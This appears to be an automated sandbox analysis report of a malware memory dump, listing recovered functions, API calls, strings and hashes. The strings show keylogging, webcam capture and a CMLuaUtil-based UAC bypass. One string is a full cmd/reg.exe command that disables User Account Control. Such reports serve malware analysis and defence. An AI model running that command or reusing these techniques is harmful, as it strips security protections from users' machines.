[regsplt], xrefs: 00413C17
TG, xrefs: 00413BFD
xUG, xrefs: 00413C46

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$xUG$TG
API String ID: 3554306468-1165877943
Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0045112C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
__alloca_probe_16.LIBCMT ref: 004511B1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
__freea.LIBCMT ref: 0045121D

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

Strings

PkGNG, xrefs: 0045112E

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID: PkGNG
API String ID: 313313983-263838557
Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

_wcslen.LIBCMT ref: 0041B763

Strings

8SG, xrefs: 0041B709, 0041B70E
program files (x86)\, xrefs: 0041B75D
.exe, xrefs: 0041B6B5
program files\, xrefs: 0041B749, 0041B750, 0041B762
http\shell\open\command, xrefs: 0041B69A

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue_wcslen
String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
API String ID: 37874593-122982132
Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269

Uniqueness

Uniqueness Score: -1.00%

Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00411170
int.LIBCPMT ref: 00411183

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 004111C3
std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
__CxxThrowException@8.LIBVCRUNTIME ref: 004111EA

Strings

(mG, xrefs: 0041117B

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: (mG
API String ID: 2536120697-4059303827
Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2

StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C

Strings

CurrentBuildNumber, xrefs: 0041B31D
(32 bit), xrefs: 0041B36F
(64 bit), xrefs: 0041B368
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041B2D7, 0041B2E1, 0041B322
ProductName, xrefs: 0041B2D2

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-2070987746
Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

Uniqueness

Uniqueness Score: -1.00%

Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D

Uniqueness

Uniqueness Score: -1.00%

Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe), ref: 004075D0

Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

CoUninitialize.OLE32 ref: 00407629

Strings

[+] ShellExec success, xrefs: 0040760E
[+] before ShellExec, xrefs: 004075F1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 004075B0, 004075B3, 00407605
[+] ucmCMLuaUtilShellExecMethod, xrefs: 004075B5

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-1898325914
Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB

Uniqueness

Uniqueness Score: -1.00%

Function 0044333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390

Strings

PkGNG, xrefs: 0044333C
mscoree.dll, xrefs: 00443353
CorExitProcess, xrefs: 00443365

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$PkGNG$mscoree.dll
API String ID: 4061214504-213444651
Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?), ref: 004044C4

Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C

Strings

FreeFrame, xrefs: 004045B0
OpenCamera, xrefs: 00404582
HNG, xrefs: 004045E6
GetFrame, xrefs: 0040459F
CloseCamera, xrefs: 0040458E

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
API String ID: 3469354165-3054508432
Opcode ID: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
Opcode Fuzzy Hash: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E

Uniqueness

Uniqueness Score: -1.00%

Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00445925
__cftoe.LIBCMT ref: 00445957

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C

Uniqueness

Uniqueness Score: -1.00%

Function 0044A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044A08F
__alldvrm.LIBCMT ref: 0044A290
__alldvrm.LIBCMT ref: 0044A2B2

Strings

PkGNG, xrefs: 0044A006

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID: PkGNG
API String ID: 1036877536-263838557
Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
_free.LIBCMT ref: 0044824C
_free.LIBCMT ref: 00448274
SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
_abort.LIBCMT ref: 00448293

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD

Uniqueness

Uniqueness Score: -1.00%

Function 00442801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

PkGNG, xrefs: 00442803

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788

Uniqueness

Uniqueness Score: -1.00%

Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

Offline Keylogger Started, xrefs: 0040B16B
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040B17B
], xrefs: 0040B180

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 1497725170-248792730
Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE

Strings

XQG, xrefs: 0040A6A0

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: XQG
API String ID: 1958988193-3606453820
Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E

Uniqueness

Uniqueness Score: -1.00%

Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041D55B
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
GetLastError.KERNEL32 ref: 0041D580

Strings

0, xrefs: 0041D52B
MsgWindowClass, xrefs: 0041D526

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
CloseHandle.KERNEL32(?), ref: 004077AA
CloseHandle.KERNEL32(?), ref: 004077AF

Strings

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
C:\Windows\System32\cmd.exe, xrefs: 00407796

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

SG, xrefs: 004076DA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 004076C4

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID:
String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
API String ID: 0-2219448981
Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E

Uniqueness

Uniqueness Score: -1.00%

Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
SetEvent.KERNEL32(?), ref: 0040512C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
CloseHandle.KERNEL32(?), ref: 00405140

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

KeepAlive | Disabled, xrefs: 004050F9

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040140A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
GetProcAddress.KERNEL32(00000000), ref: 0040141B

Strings

User32.dll, xrefs: 0040140F
GetCursorInfo, xrefs: 0040140A
`Wu, xrefs: 00401414

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll$`Wu
API String ID: 1646373207-4024354691
Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E

Uniqueness

Uniqueness Score: -1.00%

Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 004493BD

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58

